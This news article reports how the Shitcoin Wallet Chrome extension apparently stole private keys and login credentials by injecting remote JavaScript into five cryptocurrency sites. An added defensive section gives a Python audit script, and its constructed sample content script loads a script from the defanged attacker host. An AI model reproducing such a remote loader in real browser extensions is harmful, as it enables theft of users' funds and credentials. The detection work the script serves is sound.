This extension, launched on December 9, lets users manage Ether (ETH) coins and also Ethereum ERC20-based tokens — tokens usually issued for ICOs (initial coin offerings).
Users can install the Chrome extension and manage ETH coins and ERC20 tokens from within their browser. They can also install a Windows desktop app if they wish to manage their funds outside the browser.
But the Shitcoin Wallet app was not doing what it was supposed to be doing. Harry Denley, Director of Security at the MyCrypto platform, found that the extension contained malicious code.
According to him, the extension is dangerous to users in two ways. The first is that any funds (ETH coins and ERC20-based tokens) managed directly inside the extension are at risk.
The extension sends the private keys of all wallets created or managed through its interface to a third-party website located at erc20wallet[.]tk.
According to the analysis of the malicious code, the process works as follows:
- Users install the Chrome extension
- When users navigate to any of 77 specific sites, the extension loads and injects an additional JS file from: https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code
- The code activates on five websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- Once activated, the malicious JS code records the user's login credentials, searches for private keys stored inside the dashboards of the five services, and eventually sends the data to erc20wallet[.]tk
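The chain described above has a static signature a reviewer can look for before installing an extension: a content script that creates a script tag pointing at a remote host, so the real logic is fetched at runtime rather than shipped in the reviewed package, and a host that appears nowhere in the extension's declared match patterns. The following is an added example, not code from the article or from the wallet project, of a small audit over an unpacked extension. The manifest and the content script are constructed samples modelled on the behaviour the article describes; the only real identifier used is the exfiltration host the article names, written defanged exactly as it appears there.

```python
import re
from urllib.parse import urlparse

# Constructed sample manifest (MV2 layout) for a wallet-style extension whose
# content script is declared for the five services the article names.
SAMPLE_MANIFEST = {
    "manifest_version": 2,
    "name": "sample-wallet-extension",
    "permissions": ["storage", "tabs"],
    "content_scripts": [
        {
            "matches": [
                "https://www.myetherwallet.com/*",
                "https://idex.market/*",
                "https://www.binance.org/*",
                "https://neotracker.io/*",
                "https://switcheo.exchange/*",
            ],
            "js": ["content.js"],
        }
    ],
}

# Constructed sample content script: it injects a <script> whose src is a
# remote host, which is the loader pattern the article describes. The host is
# the one the article reports, kept defanged ("[.]") as on the page.
SAMPLE_CONTENT_JS = """
(function () {
  var s = document.createElement('script');
  s.src = 'https://erc20wallet[.]tk/js/content_.js';
  document.head.appendChild(s);
})();
"""

# Assignment of an absolute http(s) URL to a .src property (script/iframe loader).
SCRIPT_LOAD_RE = re.compile(r"""\.src\s*=\s*['"`](https?://[^'"`]+)""")

# Match patterns that grant the script access to every site.
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def refang(text):
    """Turn the defanged 'host[.]tld' form back into a parseable URL."""
    return text.replace("[.]", ".")


def pattern_host(pattern):
    """Hostname of a content-script match pattern, '' if it has none."""
    return urlparse(refang(pattern)).hostname or ""


def audit_extension(manifest, scripts):
    """Return (finding, detail) tuples for an unpacked extension.

    manifest: the parsed manifest.json; scripts: {filename: source text}.
    """
    findings = []
    declared_hosts = set()
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if pattern in BROAD_PATTERNS:
                findings.append(("broad-match", pattern))
            declared_hosts.add(pattern_host(pattern))
    for name, body in scripts.items():
        for url in SCRIPT_LOAD_RE.findall(refang(body)):
            host = urlparse(url).hostname or ""
            # Any runtime-loaded remote script defeats review of the package.
            findings.append(("remote-script-load", f"{name}: {url}"))
            # A loader host absent from the declared patterns is the stronger signal:
            # the extension talks to a site it never claimed to interact with.
            if host not in declared_hosts:
                findings.append(("undeclared-host", host))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_extension(SAMPLE_MANIFEST, {"content.js": SAMPLE_CONTENT_JS}):
        print(f"{kind:20} {detail}")
```

On the constructed sample this reports the remote loader and the undeclared host `erc20wallet.tk`; on a script that contains no remote `.src` assignment it reports nothing. Running the same audit over the extension's real package, before installation or as part of an allowlisting process, is the kind of check that would have surfaced the injection step the article describes.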
It is, however, not clear whether the Shitcoin Wallet team is responsible for the malicious code, or whether the Chrome extension was compromised by a third party.
On the extension's official website, 32-bit and 64-bit installers were also made available to users. When scanned with VirusTotal, both files came back clean.
But according to various comments posted on the wallet’s Telegram channel, the desktop apps might contain similar malicious code, if not worse.